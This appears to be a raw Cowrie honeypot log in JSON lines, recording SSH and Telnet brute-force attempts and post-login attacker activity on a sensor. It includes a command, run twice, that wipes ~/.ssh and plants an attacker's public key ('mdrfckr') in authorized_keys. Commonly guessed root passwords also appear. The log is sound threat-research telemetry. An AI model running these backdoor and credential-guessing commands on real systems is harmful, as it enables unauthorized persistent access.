{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:04:57.925906Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:04:58.127650Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:04:58.128603Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.session.closed","duration":120.01255583763123,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:06:32.655490Z","src_ip":"60.19.222.5","session":"7eac2ab60094"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63254,"dst_ip":"1.2.3.4","dst_port":22,"session":"a775fba46903","protocol":"ssh","message":"New connection: 217.72.205.35:63254 (1.2.3.4:22) [session: a775fba46903]","sensor":"my-vps","timestamp":"2025-09-09T05:07:25.702418Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:07:25.703514Z","src_ip":"217.72.205.35","session":"a775fba46903"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20031,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c6d0b2f4a3a","protocol":"ssh","message":"New connection: 212.227.125.160:20031 (1.2.3.4:22) [session: 0c6d0b2f4a3a]","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.181152Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.182220Z","src_ip":"212.227.125.160","session":"0c6d0b2f4a3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20319,"dst_ip":"1.2.3.4","dst_port":22,"session":"6618eeb60a21","protocol":"ssh","message":"New connection: 212.227.125.160:20319 (1.2.3.4:22) [session: 6618eeb60a21]","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.295923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.296704Z","src_ip":"212.227.125.160","session":"6618eeb60a21"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.412339Z","src_ip":"212.227.125.160","session":"6618eeb60a21"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.760512Z","src_ip":"212.227.125.160","session":"6618eeb60a21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T05:07:59.877738Z","session":"6618eeb60a21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33223,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b2732b6745e","protocol":"telnet","message":"New connection: 212.227.125.160:33223 (1.2.3.4:23) [session: 3b2732b6745e]","sensor":"my-vps","timestamp":"2025-09-09T05:08:08.689639Z"}
{"eventid":"cowrie.session.closed","duration":13.024974584579468,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:08:21.714553Z","src_ip":"212.227.125.160","session":"3b2732b6745e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:09:09.296146Z","src_ip":"212.227.125.160","session":"6618eeb60a21"}
{"eventid":"cowrie.session.closed","duration":"301.5","message":"Connection lost after 301.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:09:56.853104Z","src_ip":"14.103.112.104","session":"26bd87086494"}
{"eventid":"cowrie.session.connect","src_ip":"94.236.195.244","src_port":56974,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac04ec9b1d0c","protocol":"telnet","message":"New connection: 94.236.195.244:56974 (1.2.3.4:23) [session: ac04ec9b1d0c]","sensor":"my-vps","timestamp":"2025-09-09T05:10:40.046006Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.245","src_port":26004,"dst_ip":"1.2.3.4","dst_port":23,"session":"41b19882f1f6","protocol":"telnet","message":"New connection: 172.236.228.245:26004 (1.2.3.4:23) [session: 41b19882f1f6]","sensor":"my-vps","timestamp":"2025-09-09T05:10:46.062821Z"}
{"eventid":"cowrie.session.closed","duration":0.0018310546875,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:10:46.064577Z","src_ip":"172.236.228.245","session":"41b19882f1f6"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.245","src_port":26014,"dst_ip":"1.2.3.4","dst_port":23,"session":"17b342ca32cc","protocol":"telnet","message":"New connection: 172.236.228.245:26014 (1.2.3.4:23) [session: 17b342ca32cc]","sensor":"my-vps","timestamp":"2025-09-09T05:10:46.389187Z"}
{"eventid":"cowrie.login.failed","username":"\u0016\u0003\u0001\u0001","password":"b'\\x01\\x00\\x01\\x06\\x03\\x03\\x8f\\x03A\\x9c\\x08\\xc9IM\\x8a@N\\xe7\\x05\\x14\\xed'","message":"login attempt [\u0016\u0003\u0001\u0001/b'\\x01\\x00\\x01\\x06\\x03\\x03\\x8f\\x03A\\x9c\\x08\\xc9IM\\x8a@N\\xe7\\x05\\x14\\xed'] failed","sensor":"my-vps","timestamp":"2025-09-09T05:10:46.390416Z","src_ip":"172.236.228.245","session":"17b342ca32cc"}
{"eventid":"cowrie.session.closed","duration":0.002211332321166992,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:10:46.391312Z","src_ip":"172.236.228.245","session":"17b342ca32cc"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":44800,"dst_ip":"1.2.3.4","dst_port":22,"session":"29f92fa60c70","protocol":"ssh","message":"New connection: 92.118.39.62:44800 (1.2.3.4:22) [session: 29f92fa60c70]","sensor":"my-vps","timestamp":"2025-09-09T05:10:53.735857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:10:53.736796Z","src_ip":"92.118.39.62","session":"29f92fa60c70"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:10:53.767387Z","src_ip":"92.118.39.62","session":"29f92fa60c70"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T05:10:53.858791Z","src_ip":"92.118.39.62","session":"29f92fa60c70"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:10:54.891009Z","src_ip":"92.118.39.62","session":"29f92fa60c70"}
{"eventid":"cowrie.session.closed","duration":15.013495445251465,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:10:55.059411Z","src_ip":"94.236.195.244","session":"ac04ec9b1d0c"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":44364,"dst_ip":"1.2.3.4","dst_port":22,"session":"a72f57b17731","protocol":"ssh","message":"New connection: 14.103.112.104:44364 (1.2.3.4:22) [session: a72f57b17731]","sensor":"my-vps","timestamp":"2025-09-09T05:12:07.020813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:12:07.023722Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:12:07.223984Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwe1","message":"login attempt [root/Qwe1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:12:08.501491Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:12:10.059268Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:12:10.059846Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:12:10.061231Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:10.264374Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:12:11.183295Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:12:11.183941Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:12:11.383250Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:11.384130Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":44380,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8c2181a9fee","protocol":"ssh","message":"New connection: 14.103.112.104:44380 (1.2.3.4:22) [session: f8c2181a9fee]","sensor":"my-vps","timestamp":"2025-09-09T05:12:12.584554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:12:12.585795Z","src_ip":"14.103.112.104","session":"f8c2181a9fee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:12:12.767401Z","src_ip":"14.103.112.104","session":"f8c2181a9fee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:12:18.613354Z","src_ip":"14.103.112.104","session":"f8c2181a9fee"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:20.237498Z","src_ip":"14.103.112.104","session":"f8c2181a9fee"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":57114,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9db85f60470","protocol":"ssh","message":"New connection: 14.103.112.104:57114 (1.2.3.4:22) [session: d9db85f60470]","sensor":"my-vps","timestamp":"2025-09-09T05:12:20.453050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:12:20.453969Z","src_ip":"14.103.112.104","session":"d9db85f60470"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:12:20.663817Z","src_ip":"14.103.112.104","session":"d9db85f60470"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:12:24.777918Z","src_ip":"14.103.112.104","session":"d9db85f60470"}
{"eventid":"cowrie.session.closed","duration":"18.0","message":"Connection lost after 18.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:24.989420Z","src_ip":"14.103.112.104","session":"a72f57b17731"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:25.251393Z","src_ip":"14.103.112.104","session":"d9db85f60470"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42424,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b959c644f97","protocol":"ssh","message":"New connection: 14.103.112.104:42424 (1.2.3.4:22) [session: 2b959c644f97]","sensor":"my-vps","timestamp":"2025-09-09T05:12:42.538384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:12:42.539318Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:12:42.736660Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.login.success","username":"root","password":"*|p3lr-d-sla","message":"login attempt [root/*|p3lr-d-sla] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:12:44.530549Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:12:57.626351Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
